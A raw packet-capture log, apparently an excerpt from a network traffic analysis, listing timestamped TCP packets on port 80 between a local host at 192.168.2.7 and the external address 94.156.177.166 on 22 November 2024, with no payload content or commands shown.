Nov 22, 2024 14:17:45.596664906 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.597410917 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.597614050 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.597629070 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.597747087 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.597789049 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.598613977 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.598814011 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.598877907 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.599237919 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.599662066 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.599714994 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.600143909 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.600200891 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.600258112 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.600997925 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.601298094 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.601500988 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.601916075 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.602113962 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.602166891 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.602777004 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.603250980 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.603394032 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.603652000 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.603940964 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.603985071 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.604492903 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.604682922 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.604731083 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.605370998 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.605650902 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.605700970 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.606268883 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.606281042 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.606327057 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.607145071 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.607444048 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.607496977 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.608033895 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.608942032 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.608953953 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.608989954 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.609009027 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.609042883 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.609750032 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.609916925 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.609967947 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.610630989 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.610829115 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.610878944 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.611506939 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.611917973 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.611973047 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.612426996 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.612895966 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.612946987 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.613240957 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.613646984 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.613708019 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.614118099 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.614322901 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.614464998 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.614991903 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.615360975 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.615411997 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.615858078 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.616038084 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.616090059 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.616789103 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.617503881 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.617549896 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.617793083 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.618474007 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.618525982 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.618526936 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.618537903 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.618637085 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.619421005 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.619726896 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.619786024 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.620237112 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.620358944 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.620418072 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.621089935 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.621345043 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.621401072 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.622071028 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.622081995 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.622200966 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.622879982 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.623758078 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.623773098 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.623820066 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.624025106 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.624078035 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.624928951 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.625082970 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.625144005 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.625519037 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.625917912 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.626028061 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.626372099 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.626550913 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.626621008 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.627402067 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.627521992 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.627571106 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.628101110 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.628240108 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.628284931 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.628998995 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.629725933 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.629867077 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.629868984 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.629877090 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.629920959 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.630682945 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.717281103 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.786000013 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.786144972 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.786155939 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.786226988 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.786418915 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.786540031 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.787058115 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.787945032 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.787956953 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.788012028 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.788220882 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.788666010 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.788824081 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.789024115 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.789082050 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.789783955 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.789838076 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.790568113 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.790631056 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.790632963 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.790714979 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.791498899 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.791893959 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.791945934 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.792370081 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.792382956 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.792448997 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.793164015 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.793379068 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.793487072 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.794056892 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.794068098 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.794122934 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.794948101 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.795176983 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.795247078 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.795779943 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.796138048 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.796257973 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.796695948 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.796706915 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.796786070 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.797525883 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.798415899 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.798427105 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.798439026 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.798480034 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.798518896 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.799417973 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.799602032 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.799757957 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.800153971 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.800312042 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.800379992 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.801018953 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.801393032 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.801436901 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.801887989 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.802190065 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.802782059 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.802834034 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.803281069 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.803333044 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.803688049 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.803982019 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.804439068 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.806032896 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.806050062 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.806061029 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.806071997 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.806107998 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.806140900 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.806349039 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.806360960 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.806411982 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.807176113 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.807369947 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.807425976 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.808031082 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.808219910 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.808274031 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.808904886 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.809710026 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.809881926 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.809894085 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.809940100 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.809972048 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.810647964 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.810857058 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.810950041 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.811590910 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.811650038 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.811716080 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.812491894 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.812511921 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.812563896 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.813342094 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.813697100 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.813756943 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.814198017 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.814862967 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.814923048 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.815061092 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.815073013 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.815120935 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.815963984 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.816327095 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.816378117 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.816812992 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.816925049 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.817050934 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.817657948 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.817719936 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.818523884 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.818582058 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.819093943 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.819169998 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.819420099 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.819539070 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.819592953 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.820275068 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.820553064 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.820610046 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.821235895 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.821377993 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.821420908 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.822077036 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.822227955 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.822283030 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.822884083 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.823071003 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.823136091 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.823733091 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.823937893 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.823998928 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.824666977 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.824790001 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.824894905 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.825575113 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.825710058 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.825772047 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.826374054 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.827101946 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.827192068 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.827377081 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.827397108 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.827455997 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.828391075 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.828403950 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.828455925 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.829042912 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.829219103 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.829288960 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.829922915 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.830106974 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.830158949 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.830753088 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.831065893 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.831590891 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.831600904 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:45.873539925 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:45.987695932 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.029773951 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.071464062 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.081831932 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.081888914 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.105999947 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.119824886 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.119889021 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.201452971 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201469898 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201482058 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201493979 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201507092 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201525927 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201536894 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201543093 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.201548100 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201559067 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201627970 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.201638937 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201651096 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201663017 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201675892 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201683998 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.201704025 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.201761961 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201781034 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201792955 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201802969 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201802969 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.201813936 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201821089 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.201824903 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201836109 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201848030 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201853037 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201858997 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201862097 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.201865911 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201875925 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201886892 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201899052 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201916933 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201922894 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.201929092 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201947927 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201957941 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201965094 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.201970100 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201981068 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201988935 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.201992035 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.201998949 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202011108 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202027082 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202033043 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202039003 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202040911 CET	49750	80	192.168.2.7	94.156.177.166
Nov 22, 2024 14:17:46.202044010 CET	80	49750	94.156.177.166	192.168.2.7
Nov 22, 2024 14:17:46.202049971 CET	80	49750	94.156.177.166	192.168.2.7
